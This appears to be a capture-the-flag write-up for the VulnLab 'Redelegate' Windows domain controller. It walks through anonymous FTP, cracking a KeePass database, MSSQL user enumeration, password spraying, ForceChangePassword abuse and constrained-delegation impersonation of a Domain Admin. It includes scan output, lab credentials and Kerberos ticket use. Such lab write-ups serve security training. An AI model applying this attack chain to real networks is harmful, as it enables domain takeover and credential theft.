Anonymous FTP leaked a KeePass DB → cracked with custom wordlist → SQLGuest creds → MSSQL SID enum → password spray → ACL abuse → Constrained Delegation → DC pwned.
Platform: VulnLab
Difficulty: Medium
OS: Windows Server 2022
Domain:redelegate.vlDC IP:10.129.234.50
1. Reconnaissance
An initial Nmap scan against the target reveals a typical Windows Domain Controller profile:
SMB null authentication is accepted (Null Auth: True), but share enumeration and RID brute-forcing are both blocked with STATUS_ACCESS_DENIED, so SMB alone doesn't give us much. FTP anonymous access, however, is wide open.
2. Anonymous FTP Enumeration
Logging in anonymously to FTP reveals three files:
CyberAudit.txt
Key Takeaway: ACLs are flagged as dangerous and still being remediated — a strong signal of exploitable misconfigurations.
TrainingAgenda.txt
Key Takeaway: The training content leaks the password pattern employees were warned against — SeasonYear! (e.g. Fall2024!, Summer2024!). This is the password format to target.
3. KeePass Password Cracking
Shared.kdbx is a KeePass database. We extract its hash and crack it using a custom wordlist built from the SeasonYear! pattern:
Extract hash
Build custom wordlist
Crack with Hashcat (mode 13400 — KeePass KDBX v2/v3)
Result:Fall2024! — cracked instantly.
KeePass Contents
Opening the database reveals stored credentials:
Title
Username
Password
FTP
FTPUser
SguPZBKdRyxWzvXRWy6U
FS01 Admin
Administrator
Spdv41gg4BlBgSYIW1gF
WEB01
WordPress Panel
cn4KOEgsHqvKXPjEnSD9
SQL Guest Access
SQLGuest
zDPBpaF4FywlqIv11vii
Timesheet Manager
Timesheet
hMFS4I0Kj8Rcd62vqi5X
Payroll App
Payroll
cVkqz4bCM7kJRSNlgx2G
SMB and LDAP authentication fail for all entries. However, MSSQL (port 1433) is open and not shown by the default Nmap scan — a full port scan (-p-) is needed to find it.
4. MSSQL Access & Domain User Enumeration
Connecting as SQLGuest to the MSSQL instance:
RID Brute-Force via SID Resolution
SQL Server's SUSER_SNAME() function can resolve SIDs to usernames. By manipulating the RID component of the domain SID, we can enumerate domain accounts:
First, retrieve the domain SID from a known account:
The domain SID is: 010500000000000515000000a185deefb22433798d8e847a
The last 4 bytes are the RID (little-endian). Administrator = RID 0x1F4 = 500.
Generate bulk queries for RIDs 1000–1500:
5. Password Spraying
Using the cracked KeePass password Fall2024! against all discovered users:
Result:Marie.Curie:Fall2024! — valid credentials.
Note:Mallory.Roberts returns STATUS_ACCOUNT_RESTRICTION rather than STATUS_LOGON_FAILURE — suggesting her account may have valid credentials but a logon restriction (e.g. no interactive logon, disabled, workstation restriction).
6. ACL Abuse — ForceChangePassword
BloodHound Analysis
BloodHound reveals the following ACL chain:
Marie.Curie is a member of the Helpdesk group, which has ForceChangePassword rights over Helen.Frost. This allows us to set her password without knowing the current one.
Exploit
WinRM Access
User flag obtained.
7. BloodHound Analysis
The full attack path from Helen.Frost continues:
IT has GenericAll over FS01$, giving full control over that computer object. This means we can:
Set TrustedToAuthForDelegation (Protocol Transition / S4U2Self)
8. Constrained Delegation Setup via GenericAll on FS01$
As Helen.Frost (member of IT group with GenericAll over FS01$):
Step 1 — Reset FS01$ computer account password
Step 2 — Configure Constrained Delegation target
Step 3 — Enable Protocol Transition (S4U2Self)
Verify
FS01$ is now configured for constrained delegation with protocol transition to cifs/DC.redelegate.vl.
9. S4U2Self / S4U2Proxy — Impersonating a Domain Admin
Choosing the right impersonation target
Initial attempts to impersonate Administrator failed with KDC_ERR_BADOPTION. This means the Administrator account is flagged as "Account is sensitive and cannot be delegated" in Active Directory.
By enumerating other Domain Admins, Ryan.Cooper was found to lack this protection, making him a valid impersonation target.
Step 1 — Get a TGT for FS01$
Step 2 — S4U2Self + S4U2Proxy to get a service ticket as Ryan.Cooper
Explanation:
S4U2Self: FS01$ requests a service ticket to itself on behalf of Ryan.Cooper (protocol transition — no password needed for Ryan.Cooper)
S4U2Proxy: FS01$ uses that ticket to request a forwarded service ticket for cifs/DC.redelegate.vl on behalf of Ryan.Cooper
Step 3 — Access DC as Ryan.Cooper (Domain Admin+Root Flag)
┌──(kali㉿kali)-[~]
└─$ nmap 10.129.234.50 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-15 07:18 -0400
Nmap scan report for 10.129.234.50
Host is up (0.15s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24 01:11AM 434 CyberAudit.txt
| 10-20-24 05:14AM 2622 Shared.kdbx
|_10-20-24 01:26AM 580 TrainingAgenda.txt
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-15 11:19:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2026-03-14T11:17:27
|_Not valid after: 2026-09-13T11:17:27
|_ssl-date: 2026-03-15T11:20:04+00:00; -4s from scanner time.
| rdp-ntlm-info:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2026-03-15T11:19:57+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -4s, deviation: 0s, median: -4s
| smb2-time:
| date: 2026-03-15T11:19:55
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.50 -u "" -p ""
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.50 445 DC [+] redelegate.vl\:
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.50 -u "" -p "" --shares
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.50 445 DC [+] redelegate.vl\:
SMB 10.129.234.50 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.50 -u "" -p "" --rid-brute
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.50 445 DC [+] redelegate.vl\:
SMB 10.129.234.50 445 DC [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
┌──(kali㉿kali)-[~/Documents/redelegate]
└─$ ftp [email protected]Connected to 10.129.234.50.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||56593|)
125 Data connection already open; Transfer starting.
10-20-24 01:11AM 434 CyberAudit.txt
10-20-24 05:14AM 2622 Shared.kdbx
10-20-24 01:26AM 580 TrainingAgenda.txt
┌──(kali㉿kali)-[~/Documents/redelegate]
└─$ cat CyberAudit.txt
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
5) Prompt users to change their passwords: DONE
6) Check privileges for all users and remove high privileges: DONE
7) Remove unused objects in the domain: IN PROGRESS
8) Recheck ACLs: IN PROGRESS
┌──(kali㉿kali)-[~/Documents/redelegate]
└─$ cat TrainingAgenda.txt
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them
┌──(kali㉿kali)-[~/Documents/redelegate]
└─$ keepass2john Shared.kdbx > hash.txt
#REMOVE "Shared:" from hash text before using HashCat
HELEN.FROST --[MemberOf]--> IT
IT --[GenericAll]--> FS01$ (computer account)
FS01$ --[can be configured for Constrained Delegation]--> cifs/DC.redelegate.vl
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Ryan.Cooper@[email protected]┌──(kali㉿kali)-[~]
└─$ impacket-smbclient -k -no-pass DC.redelegate.vl
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use C$
# cd Users\Administrator\Desktop
# ls
drw-rw-rw- 0 Wed Oct 30 12:03:55 2024 .
drw-rw-rw- 0 Sun Oct 20 11:05:28 2024 ..
-rw-rw-rw- 282 Fri May 24 08:00:13 2024 desktop.ini
-rw-rw-rw- 34 Sun Mar 15 07:18:13 2026 root.txt
# get root.txt
┌──(kali㉿kali)-[~]
└─$ cat root.txt
21c2xxxxxxxxxxxxxxxxxxxxxx8186
